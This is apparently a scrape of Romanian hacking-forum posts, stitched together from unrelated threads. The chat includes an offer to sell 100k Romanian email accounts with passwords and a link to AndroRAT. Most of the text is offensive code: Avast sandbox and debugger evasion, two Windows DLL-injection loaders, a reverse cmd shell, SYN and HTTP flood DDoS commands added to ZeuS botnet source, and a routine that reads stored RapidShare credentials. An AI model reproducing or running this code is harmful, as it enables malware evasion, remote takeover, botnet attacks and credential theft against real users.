Cartman.

Da ce e ma rst UNICEF , asta e treaba statului nu a forumului ... doamne

Depinde daca mai vrea adica a fost atacat de multi useri care nu il cunosteau, l-au atacat doar pentru (1 post in plus la colectie)

Nu ca esti ..... ma omule atatea thread-uri aiurea au fost trimise la cos si tu tot continui? 1. Nu indeplinesti conditiile necesare 2. Doar in thread-ul principal se fac cereri nu faci 1000 posturi cu vreau si eu. Dupa parerea mea accest post trebuie aruncat la cos.

Hm frumoasa prezentare , bine ai venit la noi Doru daca o sa te ti de treaba o sa inveti.

Te oftici ca nu ai prins? ) Ps// vand cartuse de imprimanta cannon cu 15 lei si stick-uri de 4gb cu 14 lei )

L-am incercat si e destul de ok apropo tu singur l-ai creeat?

Ce frumos e deschis de mult? Cand il inchideti?

Am avut eu si e destul de ok scoate bine poze , bateria te tine cam 5 zile , se aude cam incet . Dar totusi da si tu detalii ce vrei sa sti despre acest model de telefon?

Am o lista cu 100k emailuri Ro am cenzurat parolele: Pret negociabil astept PM Metoda de plata : paypal , transfer bancar ... mai multe detalii in privat Edit// vandute puteti sa dati TC.

Iesi in pierdere , mai bine iti iei unu la mana a doua si iesi mai ieftin , daca te cunosti cu vanzatorul il rogi sa ti-l lasa 3,4 zile sa il ,,probezi'' sa vezi daca are probleme.

Acest soft e asemanator cu AndroRAT dar totusi exista diferente extrem de mari intre ele Download AndroRAT

Eu stiam ca e free @RoEx da a fost arestat dar iti dai seama ca nu era doar 1 care se ocupa de site intelegi?

Bun tutorial , la mai multe

Nu inteleg de ce ai cryptat parola e la download free tema pe net o.O Am tot primit PM-uri cu afla si mie parola http://encodertool.com/binary Binary to String decode -> 01110010 01110011 01110100 01100110 01101111 01110010 01110101 01101101 01110011 00101110 01100011 01101111 01101101 00110010 00110000 00110001 00110100 -> DECODE -> pass

Ce e mare greutate sa cumperi o baterie... nu e asa scumpa

So here is the Avast anti for the sandbox. We did made a program to check the module handle. Lost that bin and src. But doesn't matter was simple anyway. VB Classic: General / Module: Private Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As LongDim SimpleAntiExample As Long Function / Button or Form_Load: 'snxhk.dllPrivate Function CheckAvastSandBox() As BooleanSimpleAntiExample = GetModuleHandle(Chr(115) & Chr(110) & Chr(120) & Chr(104) & Chr(107) & Chr(46) & Chr(100) & Chr(108) & Chr(108))If SimpleAntiExample > 0 ThenEnd ' if handle is detected it will end the program.End IfEnd Function VB.NET: Function / Button or Form_Load: foreach (ProcessModule procMod in Process.GetCurrentProcess().Modules)if (procMod.ModuleName == "snxhk.dll")Debug.Print("I'm sandboxed by Avast Sandbox");

Here is a simple tuto how to deal with the mouse APIS it can be helpfull for some of you : GetX, GetY, LeftClick, LeftDown, LeftUp, RightClick, RightUp, RightDown, MiddleClick, MiddleDown, MiddleUp, MoveMouse, SetMousePos '************************************** 'Windows API/Global Declarations '************************************** Public Declare Sub mouse_event Lib "user32" (ByVal dwFlags As Long, ByVal dx As Long, ByVal dy As Long, ByVal cButtons As Long, ByVal dwExtraInfo As Long) Public Declare Function SetCursorPos Lib "user32" (ByVal x As Long, ByVal y As Long) As Long Public Declare Function GetCursorPos Lib "user32" (lpPoint As POINTAPI) As Long Public Const MOUSEEVENTF_LEFTDOWN = &H2 Public Const MOUSEEVENTF_LEFTUP = &H4 Public Const MOUSEEVENTF_MIDDLEDOWN = &H20 Public Const MOUSEEVENTF_MIDDLEUP = &H40 Public Const MOUSEEVENTF_RIGHTDOWN = &H8 Public Const MOUSEEVENTF_RIGHTUP = &H10 Public Const MOUSEEVENTF_MOVE = &H1 Public Type POINTAPI x As Long y As Long End Type Public Function GetX() As Long Dim n As POINTAPI GetCursorPos n GetX = n.x End Function Public Function GetY() As Long Dim n As POINTAPI GetCursorPos n GetY = n.y End Function Public Sub LeftClick() LeftDown LeftUp End Sub Public Sub LeftDown() mouse_event MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0 End Sub Public Sub LeftUp() mouse_event MOUSEEVENTF_LEFTUP, 0, 0, 0, 0 End Sub Public Sub MiddleClick() MiddleDown MiddleUp End Sub Public Sub MiddleDown() mouse_event MOUSEEVENTF_MIDDLEDOWN, 0, 0, 0, 0 End Sub Public Sub MiddleUp() mouse_event MOUSEEVENTF_MIDDLEUP, 0, 0, 0, 0 End Sub Public Sub MoveMouse(xMove As Long, yMove As Long) mouse_event MOUSEEVENTF_MOVE, xMove, yMove, 0, 0 End Sub Public Sub RightClick() RightDown RightUp End Sub Public Sub RightDown() mouse_event MOUSEEVENTF_RIGHTDOWN, 0, 0, 0, 0 End Sub Public Sub RightUp() mouse_event MOUSEEVENTF_RIGHTUP, 0, 0, 0, 0 End Sub Public Sub SetMousePos(xPos As Long, yPos As Long) SetCursorPos xPos, yPos End Sub

Hey, this is really advanced, and yet best method. There isn't any actual bypass, except binary patch of course. defs.h NTSYSAPI NTSTATUS NTAPI NtCreateEventPair( OUT PHANDLE IN ACCESS_MASK IN POBJECT_ATTRIBUTES EventPairHandle, DesiredAccess, ObjectAttributes OPTIONAL ); typedef struct _DEBUG_EVENT { LIST_ENTRY EventList; KEVENT ContinueEvent; CLIENT_ID ClientId; PEPROCESS Process; PETHREAD Thread; NTSTATUS Status; ULONG Flags; PETHREAD BackoutThread; DBGKM_MSG ApiMsg; } DEBUG_EVENT, *PDEBUG_EVENT; typedef struct _DBGKM_MSG { PORT_MESSAGE h; DBGKM_APINUMBER ApiNumber; ULONG ReturnedStatus; union { DBGKM_EXCEPTION Exception; DBGKM_CREATE_THREAD CreateThread; DBGKM_CREATE_PROCESS CreateProcess; DBGKM_EXIT_THREAD ExitThread; DBGKM_EXIT_PROCESS ExitProcess; DBGKM_LOAD_DLL LoadDll; DBGKM_UNLOAD_DLL UnloadDll; }; } DBGKM_MSG, *PDBGKM_MSG; detect.c #define WIN32_LEAN_AND_MEAN #include <stdio.h> #include <stdlib.h> #include <windows.h> #include "defs.h" #pragma comment(lib,"ntdll.lib") #pragma comment(lib,"psapi.lib") void QueryProcessHeapMethod(void) { PDEBUG_BUFFER buffer; buffer = RtlCreateQueryDebugBuffer(0,FALSE); RtlQueryProcessHeapInformation(buffer); if (buffer->RemoteSectionBase == (PVOID) 0x50000062) MessageBoxA(NULL,"Debugged","Warning",MB_OK); else MessageBoxA(NULL,"Not Debugged","Warning",MB_OK); if (buffer->EventPairHandle == (PVOID) 0x00002b98) MessageBoxA(NULL,"Debugged","Warning",MB_OK); else MessageBoxA(NULL,"Not Debugged","Warning",MB_OK); printf("EventPairHandle= %x",(int)buffer->EventPairHandle); } int main() { QueryProcessHeapMethod(); }

#define PROC_NAME "target.exe" #define DLL_NAME "injected.dll" unsigned long GetTargetProcessIdFromProcname(char *procName); unsigned long GetTargetThreadIdFromProcname(char *procName); __declspec(naked) loadDll(void) { _asm{ // Placeholder for the return address push 0xDEADBEEF // Save the flags and registers pushfd pushad // Placeholder for the string address and LoadLibrary push 0xDEADBEEF mov eax, 0xDEADBEEF // Call LoadLibrary with the string parameter call eax // Restore the registers and flags popad popfd // Return control to the hijacked thread ret } } __declspec(naked) loadDll_end(void) { } int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow) { void *dllString; void *stub; unsigned long wowID, threadID, stubLen, oldIP, oldprot, loadLibAddy; HANDLE hProcess, hThread; CONTEXT ctx; stubLen = (unsigned long)loadDll_end - (unsigned long)loadDll; loadLibAddy = (unsigned long)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"); wowID = GetTargetProcessIdFromProcname(PROC_NAME); hProcess = OpenProcess((PROCESS_VM_WRITE | PROCESS_VM_OPERATION), false, wowID); dllString = VirtualAllocEx(hProcess, NULL, (strlen(DLL_NAME) + 1), MEM_COMMIT, PAGE_READWRITE ); stub = VirtualAllocEx(hProcess, NULL, stubLen, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); WriteProcessMemory(hProcess, dllString, DLL_NAME, strlen(DLL_NAME), NULL); threadID = GetTargetThreadIdFromProcname(PROC_NAME); hThread = OpenThread((THREAD_GET_CONTEXT | THREAD_SET_CONTEXT | THREAD_SUSPEND_RESUME), false, threadID ); SuspendThread(hThread); ctx.ContextFlags = CONTEXT_CONTROL; GetThreadContext(hThread, &ctx); oldIP = ctx.Eip; ctx.Eip = (DWORD)stub; ctx.ContextFlags = CONTEXT_CONTROL; VirtualProtect(loadDll, stubLen, PAGE_EXECUTE_READWRITE, &oldprot); memcpy((void *)((unsigned long)loadDll + 1), &oldIP, 4); memcpy((void *)((unsigned long)loadDll + 8), &dllString, 4); memcpy((void *)((unsigned long)loadDll + 13), &loadLibAddy, 4); WriteProcessMemory(hProcess, stub, loadDll, stubLen, NULL); SetThreadContext(hThread, &ctx); ResumeThread(hThread); Sleep(8000); VirtualFreeEx(hProcess, dllString, strlen(DLL_NAME), MEM_DECOMMIT); VirtualFreeEx(hProcess, stub, stubLen, MEM_DECOMMIT); CloseHandle(hProcess); CloseHandle(hThread); return 0; } unsigned long GetTargetProcessIdFromProcname(char *procName) { PROCESSENTRY32 pe; HANDLE thSnapshot; BOOL retval, ProcFound = false; thSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(thSnapshot == INVALID_HANDLE_VALUE) { MessageBox(NULL, "Error: unable to create toolhelp snapshot", "Loader", NULL ); return false; } pe.dwSize = sizeof(PROCESSENTRY32); retval = Process32First(thSnapshot, &pe); while(retval) { if(StrStrI(pe.szExeFile, procName) ) { ProcFound = true; break; } retval = Process32Next(thSnapshot,&pe); pe.dwSize = sizeof(PROCESSENTRY32); } CloseHandle(thSnapshot); return pe.th32ProcessID; } unsigned long GetTargetThreadIdFromProcname(char *procName) { PROCESSENTRY32 pe; HANDLE thSnapshot, hProcess; BOOL retval, ProcFound = false; unsigned long pTID, threadID; thSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(thSnapshot == INVALID_HANDLE_VALUE) { MessageBox(NULL, "Error: unable to create toolhelp snapshot", "Loader", NULL ); return false; } pe.dwSize = sizeof(PROCESSENTRY32); retval = Process32First(thSnapshot, &pe); while(retval) { if(StrStrI(pe.szExeFile, procName) ) { ProcFound = true; break; } retval = Process32Next(thSnapshot,&pe); pe.dwSize = sizeof(PROCESSENTRY32); } CloseHandle(thSnapshot); _asm { mov eax, fs:[0x18] add eax, 36 mov [pTID], eax } hProcess = OpenProcess(PROCESS_VM_READ, false, pe.th32ProcessID); ReadProcessMemory(hProcess, (const void *)pTID, &threadID, 4, NULL); CloseHandle(hProcess); return threadID; }

#define DEFAULT_DLL_NAME "gamereversal.dll" #define WIN32_LEAN_AND_MEAN #include // struct with data needed for remote thread. typedef struct i_data { HINSTANCE (__stdcall *LoadLibrary)( LPCTSTR lpLibFileName ); VOID (__stdcall *ExitThread)( DWORD dwExitCode ); VOID (__stdcall *ExitProcess)( UINT uExitCode ); int (__stdcall *MessageBox)( HWND hWnd, LPCTSTR lpText, LPCTSTR lpCaption, UINT uType ); char Error[128]; char DllName[MAX_PATH]; }i_data; __inline DWORD __stdcall InjectDll( i_data *i_data ) { if( !i_data->LoadLibrary( i_data->DllName ) ) { i_data->MessageBox( NULL, i_data->Error, i_data->Error, NULL ); i_data->ExitProcess(0); } i_data->ExitThread(0); return 0; } __inline void EndInjectDll( void ){ return; } int WINAPI WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow ) { static PROCESS_INFORMATION ProcessInformation; static STARTUPINFO StartupInfo; HANDLE hProcess = 0; HANDLE hThread = 0; i_data idata; LPVOID ridata; LPVOID rInjectDll; DWORD tid; char szDll[MAX_PATH]; if( !CreateProcess( NULL, "<>", NULL, NULL, NULL, CREATE_SUSPENDED, NULL, NULL, &StartupInfo, &ProcessInformation ) ) { MessageBox( NULL, "Can't kick start the application", "www.gamereversal.com", NULL ); return 0; } hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, ProcessInformation.dwProcessId ); GetCurrentDirectory( sizeof szDll, szDll ); wsprintf( szDll, "%s%s", szDll, DEFAULT_DLL_NAME ); // fill structure with the needed data we gonna pass to remote thread. lstrlen( lpCmdLine ) ? lstrcpy( idata.DllName, lpCmdLine ) : lstrcpy( idata.DllName, szDll ); lstrcpy( idata.Error, "Can't find dll. You can specify the dll name as command line (with no quote marks and full path)." ); idata.ExitThread = ExitThread; idata.ExitProcess = ExitProcess; idata.LoadLibrary = LoadLibraryA; idata.MessageBox = MessageBoxA; // allocate memory on remote process for the thread and the structure. ridata = VirtualAllocEx( hProcess, NULL, sizeof idata, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); rInjectDll = VirtualAllocEx( hProcess, NULL, (unsigned int)((unsigned int)EndInjectDll-(unsigned int)InjectDll), MEM_COMMIT, PAGE_EXECUTE_READWRITE ); if( ridata && rInjectDll ) { // copy data to remote process. if( WriteProcessMemory( hProcess, ridata, &idata, sizeof idata, NULL ) && WriteProcessMemory( hProcess, rInjectDll, InjectDll, (unsigned int)((unsigned int)EndInjectDll-(unsigned int)InjectDll), NULL ) ) { // create thread on remote process. hThread = CreateRemoteThread( hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)rInjectDll, ridata, 0, &tid ); } if( hThread ) { // wait for remote thread to finish. WaitForSingleObject( hThread, INFINITE ); // resume main process thread. ResumeThread( ProcessInformation.hThread ); CloseHandle( hThread ); } // free memory allocated on remote process. VirtualFreeEx( hProcess, ridata, 0, MEM_RELEASE ); VirtualFreeEx( hProcess, rInjectDll, 0, MEM_RELEASE ); } CloseHandle( hProcess ); return 0; }

Here is a Reverse CMD Shell #include <winsock2.h> #pragma comment(lib,"ws2_32") void main() { WSADATA a; SOCKET b; STARTUPINFO c; PROCESS_INFORMATION d; struct sockaddr_in e; memset(&e,0,sizeof(e)); memset(&c,0,sizeof(c)); WSAStartup(0x202,&a); //Version: 0x202 = 2.2 b=WSASocket(2,1,6,0,0,0); e.sin_family=0x2; //0x2 = AF_INET e.sin_port=ntohs(0x7B9); //Port: 0x7B9 = 1977 e.sin_addr.s_addr=inet_addr("127.0.0.1"); connect(b,(struct sockaddr*)&e,sizeof(e)); c.cb=sizeof(c); c.dwFlags=0x00000100; //0x00000100 = STARTF_USESTDHANDLES c.hStdInput=c.hStdOutput=c.hStdError=(void*)b; CreateProcess(0,"cmd",0,0,1,0x08000000,0,0,&c,&d); //1 = TRUE, 0x08000000 = CREATE_NO_WINDOW }

Here is some PoC sample how to modify ZeuS source to add dDoS function. This is just for educative purpose and not for illegal use. ddos.cpp #include <windows.h> #include <ws2tcpip.h> #include <wininet.h> #include "defines.h" #include "core.h" #include "ddos.h" #include "..\common\debug.h" #include "..\common\mem.h" #include "..\common\str.h" #include "..\common\wsocket.h" #include "..\common\wininet.h" #include "..\common\httptools.h" bool gl_bStopDdos; DWORD WINAPI synFlood(LPVOID lpParam) { DWORD dwTime; SOCKET sock[MAX_SYN_SOCKETS]; int iSockets; SSYNFlood s_sf = *((SSYNFlood *)lpParam); /* if (!CWA(ws2_32, gethostbyname)(s_sf.m_szHost)) { WDEBUG0(WDDT_ERROR, "SYN flooding failed !gethostbyname()"); return 0; } */ if(s_sf.m_nPort <= 0 || s_sf.m_nPort > 65535) s_sf.m_nPort = 80; gl_bStopDdos = false; WDEBUG5(WDDT_INFO, "SYN flooding host: %s, port: %u, sockets: %u, delay: %ums, time: %umin.", s_sf.m_szHost, s_sf.m_nPort, s_sf.m_nSockets, s_sf.m_nDelay, s_sf.m_dwTime); //dwTime = CWA(kernel32, GetTickCount)(); dwTime = GetTickCount(); while ((/*CWA(kernel32, GetTickCount)()*/ GetTickCount() - dwTime) <= (s_sf.m_dwTime * 60000) && gl_bStopDdos == false) { iSockets = 0; for (DWORD i = 0; i < s_sf.m_nSockets; i++) { sock[i] = WSocket::tcpConnectA(Str::_unicodeToAnsiEx(s_sf.m_szHost, -1), s_sf.m_nPort); if(sock[i] != INVALID_SOCKET) { WSocket::tcpDisableDelay(sock[i], true); WSocket::tcpSetKeepAlive(sock[i], true, 300000, 5000); iSockets++; }else{ break; } } //CWA(kernel32, Sleep)(s_sf.m_nDelay); Sleep(s_sf.m_nDelay); for (DWORD i = 0; i < iSockets; i++) { WSocket::tcpClose(sock[i]); } } WDEBUG2(WDDT_INFO, "finished SYN flooding target: %s, after: %d min", s_sf.m_szHost, (GetTickCount() - dwTime) / 60000); return 1; } DWORD WINAPI httpFlood(LPVOID lpParam) { SHTTPFlood s_hf = *((SHTTPFlood *)lpParam); Wininet::CALLURLDATA cud; //Mem::_zero(&cud, sizeof(Wininet::CALLURLDATA)); cud.bAutoProxy = true; cud.bTryCount = 1; cud.dwRetryDelay = 0; cud.hStopEvent = coreData.globalHandles.stopEvent; cud.pstrUserAgent = Wininet::_GetIEUserAgent(); cud.pstrURL = Str::_unicodeToAnsiEx(s_hf.m_szUrl, -1); cud.Connect_dwFlags = 0; cud.SendRequest_pstrReferer = NULL; cud.SendRequest_pPostData = s_hf.m_szPostData; cud.SendRequest_dwPostDataSize = Str::_LengthW(s_hf.m_szPostData); cud.SendRequest_dwFlags = s_hf.m_nWisrfMethod; cud.DownloadData_dwSizeLimit = 512 * 1024; cud.DownloadData_pstrFileName = NULL; //DWORD time = CWA(kernel32, GetTickCount)(); DWORD time = GetTickCount(); gl_bStopDdos = false; WDEBUG3(WDDT_INFO, "HTTP flooding host: %s, delay: %ums, times: %u", s_hf.m_szUrl, s_hf.m_nDelay, s_hf.m_nTimes); DWORD i; for (i = 0; i < s_hf.m_nTimes; i++) { if(gl_bStopDdos) { break; } Wininet::_CallURL(&cud, NULL); //CWA(kernel32, Sleep)(s_hf.m_nDelay); Sleep(s_hf.m_nDelay); } WDEBUG2(WDDT_INFO, "finished HTTP flooding target: %s, after: %u times", s_hf.m_szUrl, (i+1)); return 1; } ddos.h #pragma once #define MAX_SYN_SOCKETS 250 typedef struct { LPWSTR m_szHost; DWORD m_nPort; DWORD m_nSockets; DWORD m_nDelay; DWORD m_dwTime; }SSYNFlood; typedef struct { LPWSTR m_szUrl; LPWSTR m_szPostData; DWORD m_nDelay; DWORD m_nTimes; DWORD m_nWisrfMethod; }SHTTPFlood; DWORD WINAPI httpFlood(LPVOID lpParam); DWORD WINAPI synFlood(LPVOID lpParam); extern bool gl_bStopDdos; cryptedsettings.txt remotescript_command_ddos_syn "ddos_syn" remotescript_command_ddos_http_post "ddos_http_post" remotescript_command_ddos_http_get "ddos_http_get" remotescript_command_ddos_stop "ddos_stop" cryptedsettings.h id_remotescript_command_ddos_syn, id_remotescript_command_ddos_http_post, id_remotescript_command_ddos_http_get, id_remotescript_command_ddos_stop, len_remotescript_command_ddos_syn = (8 + 1), len_remotescript_command_ddos_http_post = (14 + 1), len_remotescript_command_ddos_http_get = (13 + 1), len_remotescript_command_ddos_stop = (9 + 1), id_remotescript_command_ddos_syn, id_remotescript_command_ddos_http_post, id_remotescript_command_ddos_http_get, id_remotescript_command_ddos_stop, remotescripts: #include <ws2tcpip.h> #include "ddos.h" #include "..\common\wsocket.h" static bool ddosSyn(const LPWSTR *arguments, DWORD argumentsCount) { bool ok = false; SSYNFlood s_sf; if(argumentsCount >= 6) { s_sf.m_szHost = arguments[1]; s_sf.m_nPort = (DWORD)Str::_ToInt32W(arguments[2], NULL); s_sf.m_nSockets = (DWORD)Str::_ToInt32W(arguments[3], NULL); s_sf.m_nDelay = (DWORD)Str::_ToInt32W(arguments[4], NULL); s_sf.m_dwTime = (DWORD)Str::_ToInt32W(arguments[5], NULL); //if(CWA(ws2_32, getaddrinfo)(Str::_unicodeToAnsiEx(s_sf.m_szHost, -1), NULL, NULL, NULL)) //{ if(s_sf.m_nPort > 0 && s_sf.m_nSockets > 0 && s_sf.m_nSockets <= MAX_SYN_SOCKETS && s_sf.m_nDelay >= 0 && s_sf.m_dwTime > 0 && s_sf.m_szHost != NULL) { ok = true; }else{ WDEBUG0(WDDT_ERROR, "SYN flooding failed because invalid arguments"); } //}else{ // WDEBUG0(WDDT_ERROR, "SYN flooding failed !getaddrinfo()"); //} } if(ok) hSynFlood = CWA(kernel32, CreateThread)(NULL, 0, synFlood, &s_sf, 0, NULL); return ok; } static bool ddosHttp(const LPWSTR *arguments, DWORD argumentsCount, bool isPostRequest) { bool ok = false; SHTTPFlood s_hf; if(isPostRequest) { if(argumentsCount >= 5) { s_hf.m_nWisrfMethod = 1; //POST s_hf.m_szUrl = arguments[1]; s_hf.m_szPostData = arguments[2]; s_hf.m_nDelay = (DWORD)Str::_ToInt32W(arguments[3], NULL); s_hf.m_nTimes = (DWORD)Str::_ToInt32W(arguments[4], NULL); ok = true; } }else{ if(argumentsCount >= 4) { s_hf.m_nWisrfMethod = 0; //GET s_hf.m_szUrl = arguments[1]; s_hf.m_nDelay = (DWORD)Str::_ToInt32W(arguments[2], NULL); s_hf.m_nTimes = (DWORD)Str::_ToInt32W(arguments[3], NULL); s_hf.m_szPostData = NULL; ok = true; } } if(ok) { if(s_hf.m_szUrl != NULL && s_hf.m_nDelay >= 0 && s_hf.m_nTimes > 0) hHttpFlood = CWA(kernel32, CreateThread)(NULL, 0, httpFlood, &s_hf, 0, NULL); } return ok; } static bool ddosHttpPost(const LPWSTR *arguments, DWORD argumentsCount) { return ddosHttp(arguments, argumentsCount, true); } static bool ddosHttpGet(const LPWSTR *arguments, DWORD argumentsCount) { return ddosHttp(arguments, argumentsCount, false); } static bool ddosStop(const LPWSTR *arguments, DWORD argumentsCount) { gl_bStopDdos = true; return true; } {CryptedStrings::id_remotescript_command_ddos_syn, ddosSyn}, {CryptedStrings::id_remotescript_command_ddos_http_post, ddosHttpPost}, {CryptedStrings::id_remotescript_command_ddos_http_get, ddosHttpGet}, {CryptedStrings::id_remotescript_command_ddos_stop, ddosStop},

Coded By DeathLine All you need is: Listbox Named 'Lv1' And a memo. unit Unit1; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, ComCtrls, xmldom, XMLIntf, msxmldom, XMLDoc, StdCtrls; type TForm1 = class(TForm) Lv1: TListView; Memo1: TMemo; procedure FormCreate(Sender: TObject); private { Private declarations } public procedure GetRapidShare; function compuser: string; function CurDrv: string; end; var Form1: TForm1; implementation {$R *.dfm} procedure TForm1.FormCreate(Sender: TObject); begin GetRapidShare(); end; procedure tform1.GetRapidShare(); /// Coded By DeadLine /// var i,x:integer; user, pw, path:string; begin path:= CurDrv + ':\Users\' + compuser + '\AppData\Local\RapidShare\account.xml'; form1.memo1.Lines.LoadFromFile(path); begin //get host if copy(form1.memo1.lines[i], x, length('<login>')) = '<login>' then begin User := copy(form1.memo1.lines[i], x+length('<login>'), length(form1.memo1.lines[i])-25); end; //get port if copy(form1.memo1.lines[i], x, length('</passwort> ')) = '</passwort> ' then begin pw := copy(form1.memo1.lines[i], x+length('</passwort> '), length(form1.memo1.lines[i])-25); end; with form1.lv1.Items.Add do begin caption := 'RapidShare'; subitems.add(user); subitems.add(pw); end; end; end; Function TForm1.compuser: string; Var UserName : string; UserNameLen : Dword; Begin UserNameLen := 255; SetLength(userName, UserNameLen) ; If GetUserName(PChar(UserName), UserNameLen) Then Result := Copy(UserName,1,UserNameLen - 1) Else Result := 'Unknown'; End; function TForm1.CurDrv: string; var s1: string; s2: Char; begin GetDir(0,s1); s2 := s1[1]; CurDrv := s2; end; end.

var Form2: TForm2; implementation {$R *.dfm} procedure TForm2.Button1Click(Sender: TObject); begin Edit2.Text:='email'; Edit3.Text:='tara'; Memo1.Clear; Application.ProcessMessages; if IdTelnet1.Connected then IdTelnet1.Disconnect; //----------------------------------- IdTelnet1.Host:='mail.rambler.ru'; IdTelnet1.Port:=587; //----------------------------------- try IdTelnet1.Connect; IdTelnet1.WriteLn('HELO '+edit1.Text); IdTelnet1.WriteLn('AUTH LOGIN'); Sleep(200); IdTelnet1.WriteLn(IdEncoderMIME1.EncodeString(Edit2.Text)); //username Sleep(200); IdTelnet1.WriteLn(IdEncoderMIME1.EncodeString(Edit3.Text)); //password Sleep(100); IdTelnet1.WriteLn('MAIL FROM:'+edit1.Text); Sleep(50); IdTelnet1.WriteLn('RCPT TO:'+edit1.Text); Sleep(50); IdTelnet1.WriteLn('DATA'); Sleep(50); IdTelnet1.WriteLn('Subject:'+edit4.Text); Sleep(50); // IdTelnet1.WriteLn('DATA'); // Sleep(100); IdTelnet1.WriteLn(''); Sleep(50); IdTelnet1.Writeln(mmo1.Text); Sleep(50); IdTelnet1.WriteLn('.'); Sleep(50); IdTelnet1.Writeln('quit'); except IdTelnet1.Disconnect; end; end; procedure TForm2.IdTelnet1Status(ASender: TObject; const AStatus: TIdStatus; const AStatusText: String); begin stat1.Panels[0].Text:=AStatusText; end; procedure TForm2.IdTelnet1DataAvailable(Sender: TIdTelnet; const Buffer: String); begin Application.ProcessMessages; if Length(Trim(Buffer)) >0 then Memo1.Lines.Add(Buffer) end; procedure TForm2.FormDestroy(Sender: TObject); begin try if IdTelnet1.Connected then IdTelnet1.Disconnect; finally Application.Terminate; end; end; private { Private declarations } {shift+ctrl+c} procedure sendmail(UserNme, password, host,from,_to,Subject,body: string; port: integer); public { Public declarations } end; var Form2: TForm2; implementation {$R *.dfm} procedure TForm2.IdTelnet1Status(ASender: TObject; const AStatus: TIdStatus; const AStatusText: String); begin stat1.Panels[0].Text:=AStatusText; end; procedure TForm2.IdTelnet1DataAvailable(Sender: TIdTelnet; const Buffer: String); begin Application.ProcessMessages; if Length(Trim(Buffer)) >0 then Memo1.Lines.Add(Buffer) end; procedure TForm2.FormDestroy(Sender: TObject); begin try if IdTelnet1.Connected then IdTelnet1.Disconnect; finally Application.Terminate; end; end; procedure TForm2.sendmail(UserNme, password, host,from,_to,Subject,body: string; port: integer); begin Edit2.Text:=UserNme; Edit3.Text:=password; Memo1.Clear; Application.ProcessMessages; if IdTelnet1.Connected then IdTelnet1.Disconnect; IdTelnet1.Host:=host; IdTelnet1.Port:=port; try IdTelnet1.Connect; IdTelnet1.WriteLn('HELO '+edit1.Text); IdTelnet1.WriteLn('AUTH LOGIN'); Sleep(500); IdTelnet1.WriteLn(IdEncoderMIME1.EncodeString(UserNme)); //username IdTelnet1.WriteLn(IdEncoderMIME1.EncodeString(password)); //password Sleep(500); IdTelnet1.WriteLn('MAIL FROM:'+from); IdTelnet1.WriteLn('RCPT TO:'+_to); IdTelnet1.WriteLn('DATA'); IdTelnet1.WriteLn('Subject:'+Subject); IdTelnet1.WriteLn(''); IdTelnet1.Writeln(body); IdTelnet1.WriteLn('.'); IdTelnet1.Writeln('quit'); except IdTelnet1.Disconnect; end; end; procedure TForm2.Button1Click(Sender: TObject); begin sendmail('email', 'tara', 'mail.rambler.ru',Edit1.Text,Edit1.Text,Edit4.Text,Mmo1.Text ,587); end; end. And update